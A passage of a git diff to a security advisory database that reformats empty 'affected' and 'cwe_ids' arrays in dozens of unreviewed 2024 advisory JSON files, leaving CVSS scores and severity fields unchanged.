"cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-qm78-568c-wg6m/GHSA-qm78-568c-wg6m.json b/advisories/unreviewed/2024/09/GHSA-qm78-568c-wg6m/GHSA-qm78-568c-wg6m.json index 775ef14a64b..8d8d28d15a1 100644 --- a/advisories/unreviewed/2024/09/GHSA-qm78-568c-wg6m/GHSA-qm78-568c-wg6m.json +++ b/advisories/unreviewed/2024/09/GHSA-qm78-568c-wg6m/GHSA-qm78-568c-wg6m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-r773-284v-hh8m/GHSA-r773-284v-hh8m.json b/advisories/unreviewed/2024/09/GHSA-r773-284v-hh8m/GHSA-r773-284v-hh8m.json index c1ba56da417..a7dc5511b46 100644 --- a/advisories/unreviewed/2024/09/GHSA-r773-284v-hh8m/GHSA-r773-284v-hh8m.json +++ b/advisories/unreviewed/2024/09/GHSA-r773-284v-hh8m/GHSA-r773-284v-hh8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-rcw8-56q4-fh4w/GHSA-rcw8-56q4-fh4w.json b/advisories/unreviewed/2024/09/GHSA-rcw8-56q4-fh4w/GHSA-rcw8-56q4-fh4w.json index a4dfbb806af..b16f4320610 100644 --- a/advisories/unreviewed/2024/09/GHSA-rcw8-56q4-fh4w/GHSA-rcw8-56q4-fh4w.json +++ b/advisories/unreviewed/2024/09/GHSA-rcw8-56q4-fh4w/GHSA-rcw8-56q4-fh4w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-v64w-2rh7-3gvr/GHSA-v64w-2rh7-3gvr.json b/advisories/unreviewed/2024/09/GHSA-v64w-2rh7-3gvr/GHSA-v64w-2rh7-3gvr.json index 70c49dcf7c3..26e991fce33 100644 --- a/advisories/unreviewed/2024/09/GHSA-v64w-2rh7-3gvr/GHSA-v64w-2rh7-3gvr.json +++ b/advisories/unreviewed/2024/09/GHSA-v64w-2rh7-3gvr/GHSA-v64w-2rh7-3gvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-v7w5-cp9x-mh33/GHSA-v7w5-cp9x-mh33.json b/advisories/unreviewed/2024/09/GHSA-v7w5-cp9x-mh33/GHSA-v7w5-cp9x-mh33.json index 3f1cbf39473..be3a2cf8d3a 100644 --- a/advisories/unreviewed/2024/09/GHSA-v7w5-cp9x-mh33/GHSA-v7w5-cp9x-mh33.json +++ b/advisories/unreviewed/2024/09/GHSA-v7w5-cp9x-mh33/GHSA-v7w5-cp9x-mh33.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-wjmr-4ghf-rh39/GHSA-wjmr-4ghf-rh39.json b/advisories/unreviewed/2024/09/GHSA-wjmr-4ghf-rh39/GHSA-wjmr-4ghf-rh39.json index 3b52770eb79..328adfa4d1c 100644 --- a/advisories/unreviewed/2024/09/GHSA-wjmr-4ghf-rh39/GHSA-wjmr-4ghf-rh39.json +++ b/advisories/unreviewed/2024/09/GHSA-wjmr-4ghf-rh39/GHSA-wjmr-4ghf-rh39.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-x44q-9q24-vjf9/GHSA-x44q-9q24-vjf9.json b/advisories/unreviewed/2024/09/GHSA-x44q-9q24-vjf9/GHSA-x44q-9q24-vjf9.json index 7f00b0bb865..ad0f838e965 100644 --- a/advisories/unreviewed/2024/09/GHSA-x44q-9q24-vjf9/GHSA-x44q-9q24-vjf9.json +++ b/advisories/unreviewed/2024/09/GHSA-x44q-9q24-vjf9/GHSA-x44q-9q24-vjf9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-x79g-r583-xj83/GHSA-x79g-r583-xj83.json b/advisories/unreviewed/2024/09/GHSA-x79g-r583-xj83/GHSA-x79g-r583-xj83.json index 5509488b676..d28e057922d 100644 --- a/advisories/unreviewed/2024/09/GHSA-x79g-r583-xj83/GHSA-x79g-r583-xj83.json +++ b/advisories/unreviewed/2024/09/GHSA-x79g-r583-xj83/GHSA-x79g-r583-xj83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-xhrw-4447-w35f/GHSA-xhrw-4447-w35f.json b/advisories/unreviewed/2024/09/GHSA-xhrw-4447-w35f/GHSA-xhrw-4447-w35f.json index 33f44c011fd..5445772dd7e 100644 --- a/advisories/unreviewed/2024/09/GHSA-xhrw-4447-w35f/GHSA-xhrw-4447-w35f.json +++ b/advisories/unreviewed/2024/09/GHSA-xhrw-4447-w35f/GHSA-xhrw-4447-w35f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-25x7-jcpc-96r4/GHSA-25x7-jcpc-96r4.json b/advisories/unreviewed/2024/10/GHSA-25x7-jcpc-96r4/GHSA-25x7-jcpc-96r4.json index 5be0436fb7c..cfa264d9c1d 100644 --- a/advisories/unreviewed/2024/10/GHSA-25x7-jcpc-96r4/GHSA-25x7-jcpc-96r4.json +++ b/advisories/unreviewed/2024/10/GHSA-25x7-jcpc-96r4/GHSA-25x7-jcpc-96r4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-276c-c7gr-r4j6/GHSA-276c-c7gr-r4j6.json b/advisories/unreviewed/2024/10/GHSA-276c-c7gr-r4j6/GHSA-276c-c7gr-r4j6.json index 59122c10a91..da657ca1dad 100644 --- a/advisories/unreviewed/2024/10/GHSA-276c-c7gr-r4j6/GHSA-276c-c7gr-r4j6.json +++ b/advisories/unreviewed/2024/10/GHSA-276c-c7gr-r4j6/GHSA-276c-c7gr-r4j6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-2cqv-65v5-fpv5/GHSA-2cqv-65v5-fpv5.json b/advisories/unreviewed/2024/10/GHSA-2cqv-65v5-fpv5/GHSA-2cqv-65v5-fpv5.json index f1645918a55..4102083936f 100644 --- a/advisories/unreviewed/2024/10/GHSA-2cqv-65v5-fpv5/GHSA-2cqv-65v5-fpv5.json +++ b/advisories/unreviewed/2024/10/GHSA-2cqv-65v5-fpv5/GHSA-2cqv-65v5-fpv5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-2gvh-vj62-qjmp/GHSA-2gvh-vj62-qjmp.json b/advisories/unreviewed/2024/10/GHSA-2gvh-vj62-qjmp/GHSA-2gvh-vj62-qjmp.json index 670d801f777..8b0e007d0bf 100644 --- a/advisories/unreviewed/2024/10/GHSA-2gvh-vj62-qjmp/GHSA-2gvh-vj62-qjmp.json +++ b/advisories/unreviewed/2024/10/GHSA-2gvh-vj62-qjmp/GHSA-2gvh-vj62-qjmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-2h93-g5hm-9qcv/GHSA-2h93-g5hm-9qcv.json b/advisories/unreviewed/2024/10/GHSA-2h93-g5hm-9qcv/GHSA-2h93-g5hm-9qcv.json index 0319b956328..86a918e7158 100644 --- a/advisories/unreviewed/2024/10/GHSA-2h93-g5hm-9qcv/GHSA-2h93-g5hm-9qcv.json +++ b/advisories/unreviewed/2024/10/GHSA-2h93-g5hm-9qcv/GHSA-2h93-g5hm-9qcv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-2v28-q9qp-f3gx/GHSA-2v28-q9qp-f3gx.json b/advisories/unreviewed/2024/10/GHSA-2v28-q9qp-f3gx/GHSA-2v28-q9qp-f3gx.json index 55581847175..863ea48f64d 100644 --- a/advisories/unreviewed/2024/10/GHSA-2v28-q9qp-f3gx/GHSA-2v28-q9qp-f3gx.json +++ b/advisories/unreviewed/2024/10/GHSA-2v28-q9qp-f3gx/GHSA-2v28-q9qp-f3gx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-2w8h-hch2-v23h/GHSA-2w8h-hch2-v23h.json b/advisories/unreviewed/2024/10/GHSA-2w8h-hch2-v23h/GHSA-2w8h-hch2-v23h.json index 18b8f832224..e29f8ab9d7f 100644 --- a/advisories/unreviewed/2024/10/GHSA-2w8h-hch2-v23h/GHSA-2w8h-hch2-v23h.json +++ b/advisories/unreviewed/2024/10/GHSA-2w8h-hch2-v23h/GHSA-2w8h-hch2-v23h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-64qp-9xf4-2pch/GHSA-64qp-9xf4-2pch.json b/advisories/unreviewed/2024/10/GHSA-64qp-9xf4-2pch/GHSA-64qp-9xf4-2pch.json index 133114b81d1..1bef44adc49 100644 --- a/advisories/unreviewed/2024/10/GHSA-64qp-9xf4-2pch/GHSA-64qp-9xf4-2pch.json +++ b/advisories/unreviewed/2024/10/GHSA-64qp-9xf4-2pch/GHSA-64qp-9xf4-2pch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-66x6-php2-c8mm/GHSA-66x6-php2-c8mm.json b/advisories/unreviewed/2024/10/GHSA-66x6-php2-c8mm/GHSA-66x6-php2-c8mm.json index d9806e581a3..eea0a426e5e 100644 --- a/advisories/unreviewed/2024/10/GHSA-66x6-php2-c8mm/GHSA-66x6-php2-c8mm.json +++ b/advisories/unreviewed/2024/10/GHSA-66x6-php2-c8mm/GHSA-66x6-php2-c8mm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-6xcc-g3rp-76vh/GHSA-6xcc-g3rp-76vh.json b/advisories/unreviewed/2024/10/GHSA-6xcc-g3rp-76vh/GHSA-6xcc-g3rp-76vh.json index 0bf83da0286..0b7dafac9e4 100644 --- a/advisories/unreviewed/2024/10/GHSA-6xcc-g3rp-76vh/GHSA-6xcc-g3rp-76vh.json +++ b/advisories/unreviewed/2024/10/GHSA-6xcc-g3rp-76vh/GHSA-6xcc-g3rp-76vh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-7m46-88q5-mp7g/GHSA-7m46-88q5-mp7g.json b/advisories/unreviewed/2024/10/GHSA-7m46-88q5-mp7g/GHSA-7m46-88q5-mp7g.json index 8bd7a0e331e..d0f92b9ac58 100644 --- a/advisories/unreviewed/2024/10/GHSA-7m46-88q5-mp7g/GHSA-7m46-88q5-mp7g.json +++ b/advisories/unreviewed/2024/10/GHSA-7m46-88q5-mp7g/GHSA-7m46-88q5-mp7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-7x5f-2xxg-4jm6/GHSA-7x5f-2xxg-4jm6.json b/advisories/unreviewed/2024/10/GHSA-7x5f-2xxg-4jm6/GHSA-7x5f-2xxg-4jm6.json index 678c3491012..48e4c66d544 100644 --- a/advisories/unreviewed/2024/10/GHSA-7x5f-2xxg-4jm6/GHSA-7x5f-2xxg-4jm6.json +++ b/advisories/unreviewed/2024/10/GHSA-7x5f-2xxg-4jm6/GHSA-7x5f-2xxg-4jm6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-8r8w-7pvp-9gqf/GHSA-8r8w-7pvp-9gqf.json b/advisories/unreviewed/2024/10/GHSA-8r8w-7pvp-9gqf/GHSA-8r8w-7pvp-9gqf.json index f8e7c2471c6..e1b13ecc0af 100644 --- a/advisories/unreviewed/2024/10/GHSA-8r8w-7pvp-9gqf/GHSA-8r8w-7pvp-9gqf.json +++ b/advisories/unreviewed/2024/10/GHSA-8r8w-7pvp-9gqf/GHSA-8r8w-7pvp-9gqf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-c3cx-mm7p-wgj8/GHSA-c3cx-mm7p-wgj8.json b/advisories/unreviewed/2024/10/GHSA-c3cx-mm7p-wgj8/GHSA-c3cx-mm7p-wgj8.json index ac46d42d628..9c450243315 100644 --- a/advisories/unreviewed/2024/10/GHSA-c3cx-mm7p-wgj8/GHSA-c3cx-mm7p-wgj8.json +++ b/advisories/unreviewed/2024/10/GHSA-c3cx-mm7p-wgj8/GHSA-c3cx-mm7p-wgj8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-c4vm-rj4p-m3c8/GHSA-c4vm-rj4p-m3c8.json b/advisories/unreviewed/2024/10/GHSA-c4vm-rj4p-m3c8/GHSA-c4vm-rj4p-m3c8.json index 533afd2ef1e..8c8e4d15dae 100644 --- a/advisories/unreviewed/2024/10/GHSA-c4vm-rj4p-m3c8/GHSA-c4vm-rj4p-m3c8.json +++ b/advisories/unreviewed/2024/10/GHSA-c4vm-rj4p-m3c8/GHSA-c4vm-rj4p-m3c8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-cx67-p8xc-qwg4/GHSA-cx67-p8xc-qwg4.json b/advisories/unreviewed/2024/10/GHSA-cx67-p8xc-qwg4/GHSA-cx67-p8xc-qwg4.json index 1930be87169..3042682e240 100644 --- a/advisories/unreviewed/2024/10/GHSA-cx67-p8xc-qwg4/GHSA-cx67-p8xc-qwg4.json +++ b/advisories/unreviewed/2024/10/GHSA-cx67-p8xc-qwg4/GHSA-cx67-p8xc-qwg4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-f3xx-63r9-v2cp/GHSA-f3xx-63r9-v2cp.json b/advisories/unreviewed/2024/10/GHSA-f3xx-63r9-v2cp/GHSA-f3xx-63r9-v2cp.json index 661347158f1..92fe1ea572d 100644 --- a/advisories/unreviewed/2024/10/GHSA-f3xx-63r9-v2cp/GHSA-f3xx-63r9-v2cp.json +++ b/advisories/unreviewed/2024/10/GHSA-f3xx-63r9-v2cp/GHSA-f3xx-63r9-v2cp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-ggxf-hwrw-c5q2/GHSA-ggxf-hwrw-c5q2.json b/advisories/unreviewed/2024/10/GHSA-ggxf-hwrw-c5q2/GHSA-ggxf-hwrw-c5q2.json index 6f90f112ab0..38997a77a57 100644 --- a/advisories/unreviewed/2024/10/GHSA-ggxf-hwrw-c5q2/GHSA-ggxf-hwrw-c5q2.json +++ b/advisories/unreviewed/2024/10/GHSA-ggxf-hwrw-c5q2/GHSA-ggxf-hwrw-c5q2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-h7r9-ffqq-5r47/GHSA-h7r9-ffqq-5r47.json b/advisories/unreviewed/2024/10/GHSA-h7r9-ffqq-5r47/GHSA-h7r9-ffqq-5r47.json index b41cfd31deb..6f66ce0658d 100644 --- a/advisories/unreviewed/2024/10/GHSA-h7r9-ffqq-5r47/GHSA-h7r9-ffqq-5r47.json +++ b/advisories/unreviewed/2024/10/GHSA-h7r9-ffqq-5r47/GHSA-h7r9-ffqq-5r47.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-h9jc-p2cr-c4rx/GHSA-h9jc-p2cr-c4rx.json b/advisories/unreviewed/2024/10/GHSA-h9jc-p2cr-c4rx/GHSA-h9jc-p2cr-c4rx.json index 90ed438c08a..81075212c79 100644 --- a/advisories/unreviewed/2024/10/GHSA-h9jc-p2cr-c4rx/GHSA-h9jc-p2cr-c4rx.json +++ b/advisories/unreviewed/2024/10/GHSA-h9jc-p2cr-c4rx/GHSA-h9jc-p2cr-c4rx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-h9pq-rfrf-6f7p/GHSA-h9pq-rfrf-6f7p.json b/advisories/unreviewed/2024/10/GHSA-h9pq-rfrf-6f7p/GHSA-h9pq-rfrf-6f7p.json index a96a23aa0b2..48be1b282b4 100644 --- a/advisories/unreviewed/2024/10/GHSA-h9pq-rfrf-6f7p/GHSA-h9pq-rfrf-6f7p.json +++ b/advisories/unreviewed/2024/10/GHSA-h9pq-rfrf-6f7p/GHSA-h9pq-rfrf-6f7p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-hpqg-3xxv-rhj6/GHSA-hpqg-3xxv-rhj6.json b/advisories/unreviewed/2024/10/GHSA-hpqg-3xxv-rhj6/GHSA-hpqg-3xxv-rhj6.json index d8be7912423..6fa3bb76644 100644 --- a/advisories/unreviewed/2024/10/GHSA-hpqg-3xxv-rhj6/GHSA-hpqg-3xxv-rhj6.json +++ b/advisories/unreviewed/2024/10/GHSA-hpqg-3xxv-rhj6/GHSA-hpqg-3xxv-rhj6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-jww8-jcqp-pmjm/GHSA-jww8-jcqp-pmjm.json b/advisories/unreviewed/2024/10/GHSA-jww8-jcqp-pmjm/GHSA-jww8-jcqp-pmjm.json index 1d405c892ad..0f913381576 100644 --- a/advisories/unreviewed/2024/10/GHSA-jww8-jcqp-pmjm/GHSA-jww8-jcqp-pmjm.json +++ b/advisories/unreviewed/2024/10/GHSA-jww8-jcqp-pmjm/GHSA-jww8-jcqp-pmjm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-mp23-j9p6-rgph/GHSA-mp23-j9p6-rgph.json b/advisories/unreviewed/2024/10/GHSA-mp23-j9p6-rgph/GHSA-mp23-j9p6-rgph.json index 80cb622d984..d3545059c8e 100644 --- a/advisories/unreviewed/2024/10/GHSA-mp23-j9p6-rgph/GHSA-mp23-j9p6-rgph.json +++ b/advisories/unreviewed/2024/10/GHSA-mp23-j9p6-rgph/GHSA-mp23-j9p6-rgph.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-p5wf-4fg4-hw2q/GHSA-p5wf-4fg4-hw2q.json b/advisories/unreviewed/2024/10/GHSA-p5wf-4fg4-hw2q/GHSA-p5wf-4fg4-hw2q.json index a7d1c18aad6..240063411a4 100644 --- a/advisories/unreviewed/2024/10/GHSA-p5wf-4fg4-hw2q/GHSA-p5wf-4fg4-hw2q.json +++ b/advisories/unreviewed/2024/10/GHSA-p5wf-4fg4-hw2q/GHSA-p5wf-4fg4-hw2q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-p8wj-q5fw-6q9q/GHSA-p8wj-q5fw-6q9q.json b/advisories/unreviewed/2024/10/GHSA-p8wj-q5fw-6q9q/GHSA-p8wj-q5fw-6q9q.json index 4e639d17596..c6d19d7f001 100644 --- a/advisories/unreviewed/2024/10/GHSA-p8wj-q5fw-6q9q/GHSA-p8wj-q5fw-6q9q.json +++ b/advisories/unreviewed/2024/10/GHSA-p8wj-q5fw-6q9q/GHSA-p8wj-q5fw-6q9q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-phj7-phjc-r9wg/GHSA-phj7-phjc-r9wg.json b/advisories/unreviewed/2024/10/GHSA-phj7-phjc-r9wg/GHSA-phj7-phjc-r9wg.json index 7db9bb8e9e1..a57befdfb1f 100644 --- a/advisories/unreviewed/2024/10/GHSA-phj7-phjc-r9wg/GHSA-phj7-phjc-r9wg.json +++ b/advisories/unreviewed/2024/10/GHSA-phj7-phjc-r9wg/GHSA-phj7-phjc-r9wg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-pr83-52rx-w5f5/GHSA-pr83-52rx-w5f5.json b/advisories/unreviewed/2024/10/GHSA-pr83-52rx-w5f5/GHSA-pr83-52rx-w5f5.json index cad313b9a28..b84445de248 100644 --- a/advisories/unreviewed/2024/10/GHSA-pr83-52rx-w5f5/GHSA-pr83-52rx-w5f5.json +++ b/advisories/unreviewed/2024/10/GHSA-pr83-52rx-w5f5/GHSA-pr83-52rx-w5f5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-q2x4-35qf-p4qw/GHSA-q2x4-35qf-p4qw.json b/advisories/unreviewed/2024/10/GHSA-q2x4-35qf-p4qw/GHSA-q2x4-35qf-p4qw.json index 02aaac9ee96..c38a996c8b1 100644 --- a/advisories/unreviewed/2024/10/GHSA-q2x4-35qf-p4qw/GHSA-q2x4-35qf-p4qw.json +++ 